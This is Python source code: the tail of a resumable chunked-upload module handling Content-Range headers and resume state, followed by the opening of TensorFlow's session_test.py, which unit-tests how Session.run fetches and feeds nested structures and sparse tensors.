self.__progress = self.__GetLastByte(range_header) + 1
self.stream.seek(self.progress)
else:
raise exceptions.HttpError.FromResponse(refresh_response)
def _GetRangeHeaderFromResponse(self, response):
return response.info.get('Range', response.info.get('range'))
def InitializeUpload(self, http_request, http=None, client=None):
"""Initialize this upload from the given http_request."""
if self.strategy is None:
raise exceptions.UserError(
'No upload strategy set; did you call ConfigureRequest?')
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
if self.strategy != RESUMABLE_UPLOAD:
return
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
self.EnsureUninitialized()
http_response = http_wrapper.MakeRequest(http, http_request,
retries=self.num_retries)
if http_response.status_code != http_client.OK:
raise exceptions.HttpError.FromResponse(http_response)
self.__server_chunk_granularity = http_response.info.get(
'X-Goog-Upload-Chunk-Granularity')
url = http_response.info['location']
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
return self.StreamInChunks()
else:
return http_response
def __GetLastByte(self, range_header):
_, _, end = range_header.partition('-')
# TODO(craigcitro): Validate start == 0?
return int(end)
def __ValidateChunksize(self, chunksize=None):
if self.__server_chunk_granularity is None:
return
chunksize = chunksize or self.chunksize
if chunksize % self.__server_chunk_granularity:
raise exceptions.ConfigurationValueError(
'Server requires chunksize to be a multiple of %d',
self.__server_chunk_granularity)
def __StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Helper function for StreamMedia / StreamInChunks."""
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidUserInputError(
'Cannot stream non-resumable upload')
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
# final_response is set if we resumed an already-completed upload.
response = self.__final_response
send_func = self.__SendChunk if use_chunks else self.__SendMediaBody
if use_chunks:
self.__ValidateChunksize(self.chunksize)
self.EnsureInitialized()
while not self.complete:
response = send_func(self.stream.tell(),
additional_headers=additional_headers)
if response.status_code in (http_client.OK, http_client.CREATED):
self.__complete = True
break
self.__progress = self.__GetLastByte(response.info['range'])
if self.progress + 1 != self.stream.tell():
# TODO(craigcitro): Add a better way to recover here.
raise exceptions.CommunicationError(
'Failed to transfer all bytes in chunk, upload paused at '
'byte %d' % self.progress)
self._ExecuteCallback(callback, response)
if self.__complete and hasattr(self.stream, 'seek'):
current_pos = self.stream.tell()
self.stream.seek(0, os.SEEK_END)
end_pos = self.stream.tell()
self.stream.seek(current_pos)
if current_pos != end_pos:
raise exceptions.TransferInvalidError(
'Upload complete with %s additional bytes left in stream' %
(int(end_pos) - int(current_pos)))
self._ExecuteCallback(finish_callback, response)
return response
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this resumable upload in a single request.
Args:
callback: Progress callback function with inputs
(http_wrapper.Response, transfer.Upload)
finish_callback: Final callback function with inputs
(http_wrapper.Response, transfer.Upload)
additional_headers: Dict of headers to include with the upload
http_wrapper.Request.
Returns:
http_wrapper.Response of final response.
"""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers, use_chunks=False)
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this (resumable) upload in chunks."""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers)
def __SendMediaRequest(self, request, end):
"""Request helper function for SendMediaBody & SendChunk."""
response = http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
if response.status_code not in (http_client.OK, http_client.CREATED,
http_wrapper.RESUME_INCOMPLETE):
# We want to reset our state to wherever the server left us
# before this failed request, and then raise.
self.RefreshResumableUploadState()
raise exceptions.HttpError.FromResponse(response)
if response.status_code == http_wrapper.RESUME_INCOMPLETE:
last_byte = self.__GetLastByte(
self._GetRangeHeaderFromResponse(response))
if last_byte + 1 != end:
self.stream.seek(last_byte)
return response
def __SendMediaBody(self, start, additional_headers=None):
"""Send the entire media stream in a single request."""
self.EnsureInitialized()
if self.total_size is None:
raise exceptions.TransferInvalidError(
'Total size must be known for SendMediaBody')
body_stream = stream_slice.StreamSlice(
self.stream, self.total_size - start)
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if start == self.total_size:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
range_string = 'bytes %s-%s/%s' % (start, self.total_size - 1,
self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, self.total_size)
def __SendChunk(self, start, additional_headers=None):
"""Send the specified chunk."""
self.EnsureInitialized()
no_log_body = self.total_size is None
if self.total_size is None:
# For the streaming resumable case, we need to detect when
# we're at the end of the stream.
body_stream = buffered_stream.BufferedStream(
self.stream, start, self.chunksize)
end = body_stream.stream_end_position
if body_stream.stream_exhausted:
self.__total_size = end
# TODO: Here, change body_stream from a stream to a string object,
# which means reading a chunk into memory. This works around
# https://code.google.com/p/httplib2/issues/detail?id=176 which can
# cause httplib2 to skip bytes on 401's for file objects.
# Rework this solution to be more general.
# pylint: disable=redefined-variable-type
body_stream = body_stream.read(self.chunksize)
else:
end = min(start + self.chunksize, self.total_size)
body_stream = stream_slice.StreamSlice(self.stream, end - start)
# TODO(craigcitro): Think about clearer errors on "no data in
# stream".
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if no_log_body:
# Disable logging of streaming body.
# TODO: Remove no_log_body and rework as part of a larger logs
# refactor.
request.loggable_body = '<media body>'
if self.total_size is None:
# Streaming resumable upload case, unknown total size.
range_string = 'bytes %s-%s/*' % (start, end - 1)
elif end == start:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
# Normal resumable upload case with known sizes.
range_string = 'bytes %s-%s/%s' % (start, end - 1, self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, end)
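# A minimal usage sketch tying the methods above together; it is illustrative
# only and the exact constructor arguments are assumptions, not part of this
# module:
#
#   upload = Upload.FromStream(stream, mime_type='application/octet-stream',
#                              total_size=size, chunksize=1 << 20)
#   # ... configure the upload against an initialized request/session ...
#   response = upload.StreamInChunks()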
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
@test_util.with_c_api
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2
})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config.session_inter_op_thread_pool) - 1)
with session.Session(config=config) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
if ops._USE_C_API:
return # No shape registration for 'ConstructionFails'
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEquals(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEquals(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
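# The nesting tests below verify that Session.run mirrors the structure of its
# fetches argument: lists, tuples, namedtuples and dicts come back with the
# same shape, with every Tensor replaced by its value and every Operation by
# None, e.g. sess.run({'x': [a, b]}) -> {'x': [a_val, b_val]}.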
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
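# Fetching a SparseTensor yields a SparseTensorValue namedtuple with fields
# (indices, values, dense_shape), which also unpacks as a plain 3-tuple, and a
# sparse placeholder can be fed with either a 3-tuple or a SparseTensorValue;
# the tests below exercise both directions.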
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
